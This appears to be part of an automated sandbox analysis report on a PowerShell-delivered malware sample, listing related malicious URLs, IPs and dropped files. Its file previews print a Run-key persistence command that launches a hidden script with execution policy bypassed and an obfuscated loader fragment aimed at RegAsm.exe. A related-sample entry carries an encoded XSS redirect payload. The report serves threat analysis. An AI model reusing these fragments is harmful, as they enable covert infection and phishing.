                                                            http://getcloudapp.comGet hashmaliciousUnknownBrowse
                                                            • 18.245.46.12
                                                            Audio playback00_05-30-00000.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 54.217.9.133
                                                            https://ca.docusign.net/Signing/EmailStart.aspx?a=9cc8ef59-5f05-4591-9bc5-780c38f1f38e&etti=24&acct=92cb33b7-3a5a-457e-8432-7aac96872a1d&er=6f6f9a2a-4785-4b45-841b-3f3b157db196Get hashmaliciousUnknownBrowse
                                                            • 35.160.173.122
                                                            http://trello.com/c/VmtGBtm4Get hashmaliciousHTMLPhisherBrowse
                                                            • 65.9.66.7
                                                            https://24yah200mai108e89dios181rsd71c0ios99.netlify.app/Get hashmaliciousUnknownBrowse
                                                            • 143.204.98.2
                                                            https://soygmail.pythonanywhere.com/login/Get hashmaliciousUnknownBrowse
                                                            • 54.231.197.24
                                                            http://walletsupportdesk.com/Get hashmaliciousUnknownBrowse
                                                            • 108.138.26.43
                                                            https://violation-policy-meta-ticket-id6398903.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • 76.76.21.98
                                                            PORTLANEwwwportlanecomSE9B10a4bkpu.elfGet hashmaliciousMiraiBrowse
                                                            • 5.254.217.53
                                                            SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                            • 46.246.80.17
                                                            http://lakerie.comGet hashmaliciousUnknownBrowse
                                                            • 5.249.165.116
                                                            SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exeGet hashmaliciousUnknownBrowse
                                                            • 185.117.88.39
                                                            SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exeGet hashmaliciousUnknownBrowse
                                                            • 185.117.88.39
                                                            MACHINE_SPECIFICATION.jsGet hashmaliciousWSHRatBrowse
                                                            • 46.246.84.83
                                                            HDKuOe.exeGet hashmaliciousUnknownBrowse
                                                            • 185.117.88.39
                                                            HDKuOe.exeGet hashmaliciousUnknownBrowse
                                                            • 185.117.88.39
                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 5.254.217.95
                                                            Requerimiento_Juridico_Proferido_N#U00b0_437361838..exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 46.246.80.9
                                                            CLOUDFLARENETUShttp://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4CGet hashmaliciousPhisherBrowse
                                                            • 104.21.61.175
                                                            http://icmtg.comGet hashmaliciousUnknownBrowse
                                                            • 104.22.1.204
                                                            http://getcloudapp.comGet hashmaliciousUnknownBrowse
                                                            • 172.64.150.44
                                                            https://www.ringaraja.net/portleti/katalogponudnikov/result.asp?id=4336&s=&t=51&p=50&url=//form.jotform.com/Maka_Cro/antibot-protectionyrhifhwrfhguhewrgGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.22.72.81
                                                            SecuriteInfo.com.Win32.PWSX-gen.14983.3693.exeGet hashmaliciousLummaCBrowse
                                                            • 104.21.51.224
                                                            Audio playback00_05-30-00000.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 172.64.151.101
                                                            http://trello.com/c/VmtGBtm4Get hashmaliciousHTMLPhisherBrowse
                                                            • 1.1.1.1
                                                            https://www.google.com/url?q=3oMRWXBzxXkuhasVZOBU8evdsHOSozuoMRWXBzxXkuhasVZOBU8evdsDz3yh&rct=tTPSoMRWXBzxXkuhasVZOBU8evdsFX0oMRWXBzxXkuhasVZOBU8evdsjkXyycT&sa=t&url=amp%2F%70%72%6F%6A%65%74%6F%70%6C%75%73%73%69%7A%65%2E%63%6F%6D%2E%62%72%2F%69%61%6D%67%65%73%32%2F%2FoMRWXBzxXkuhasVZOBU8evds/oMRWXBzxXkuhasVZOBU8evds/amdpbGxAY2VlbnRhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).jsGet hashmaliciousGookitLoaderBrowse
                                                            • 104.21.68.103
                                                            are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).jsGet hashmaliciousGookitLoaderBrowse
                                                            • 172.67.156.7
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0ehttp://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4CGet hashmaliciousPhisherBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).jsGet hashmaliciousGookitLoaderBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).jsGet hashmaliciousGookitLoaderBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            https://dev-skbfc.pantheonsite.io/wp-content/plugins/z-downloads/Get hashmaliciousUnknownBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            https://w-vipps.pl/Get hashmaliciousUnknownBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            https://a-e0d81e.ingress-earth.ewp.live/wp-content/plugins/12/paiement.phpGet hashmaliciousUnknownBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            http://telegram.ins-kro.org/Get hashmaliciousUnknownBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            LUYYSwStKN.ps1Get hashmaliciousXWormBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                            • 76.76.21.22
                                                            • 104.20.4.235
                                                            No context
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):418
                                                            Entropy (8bit):5.356499146491567
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAv:MLU84jE4K5E4KO
                                                            MD5:DD76058F7DDB0EF40EF99C0B50089985
                                                            SHA1:AE93EF979AC4E0B61938E023CB6B3DE841653BD8
                                                            SHA-256:E4A1D5B6454DF5E72015FFE84752994AB1577A96E8C78054A65F555A0A049843
                                                            SHA-512:F68F7C437C564FFD7F5F754B908D46BC1815C1C58AD17198AF4FD49DFB2AD8C71C066B95B7A68C73B198EF4F4BE8A78E9883E05D8A5816F210979FE8C447FD5D
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with very long lines (337), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):337
                                                            Entropy (8bit):5.165829706141399
                                                            Encrypted:false
                                                            SSDEEP:6:sDuwZH1j0IQHjo5g1oTrcsny1R3KbQO0cbENjAu923oH+B2KZmI54645NHRn:sVVj0pNsngkbQpcVrYe1KP7
                                                            MD5:0B9F8BC562B16DDAF49601456EB19C64
                                                            SHA1:1C6C8E31007C4FB9F56E94FC5833E6433B7EF4B2
                                                            SHA-256:590ACE7E908A995BC5E5C8E4BF6AE8B9E0E0320BF3A1F8FC2005559851A0D633
                                                            SHA-512:E845D9D777345B449B792FC2789086C47415FD091622C550E7A44BBFFFE04436E564A2299079CA256779A7A24BD776D55977DCB06F6D7EDA8940E83A29B7D377
                                                            Malicious:false
                                                            Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_nyj" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman `". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' `";exit" -PropertyType "String" -force ; exit
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (32656)
                                                            Category:dropped
                                                            Size (bytes):255248
                                                            Entropy (8bit):2.9997049187293987
                                                            Encrypted:false
                                                            SSDEEP:1536:l1vKYrQMaxsA0Au+JGCCkthtwDs+7TS2I5pzFme43l6+7Pua:l1zOeCCkthtwoU22AppmeWlBPua
                                                            MD5:044A14E34D8F839CB0787154259B7375
                                                            SHA1:9E73BE641015A80700271E8E43634FA448D21E66
                                                            SHA-256:DFF99CD215C9FFE66E2786E61A20B6648CFF0FAA1D4FF65548D87B0E422E2756
                                                            SHA-512:A075963D0C1F913A1C7C7CE2A4B591D2B26A0FECDA93DD2C8E0D0B58746667B4291F614F9D8D5912C2201826C9FDF752661750797F886F9DEE44577327704FE3
                                                            Malicious:true
                                                            Preview:..$.d.q.s.x.B. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.R.e.g.A.s.m...e.x.e.'.;.....$.f.V.L.F.U. .=. .'..!:..!'.;...$.j.u.N.m.Q. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!T..!:..!E.D..!:..!G.G.g.7.G.Y..!:..!.!:..!.!:..!.!:..!.!:..!
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllulx51ll/h:NllU
                                                            MD5:4293FEE5C8B10DA4F196BB8D3E9677AB
                                                            SHA1:24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
                                                            SHA-256:95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
                                                            SHA-512:262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
                                                            Malicious:false
                                                            Preview:@...e................................. ..............@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
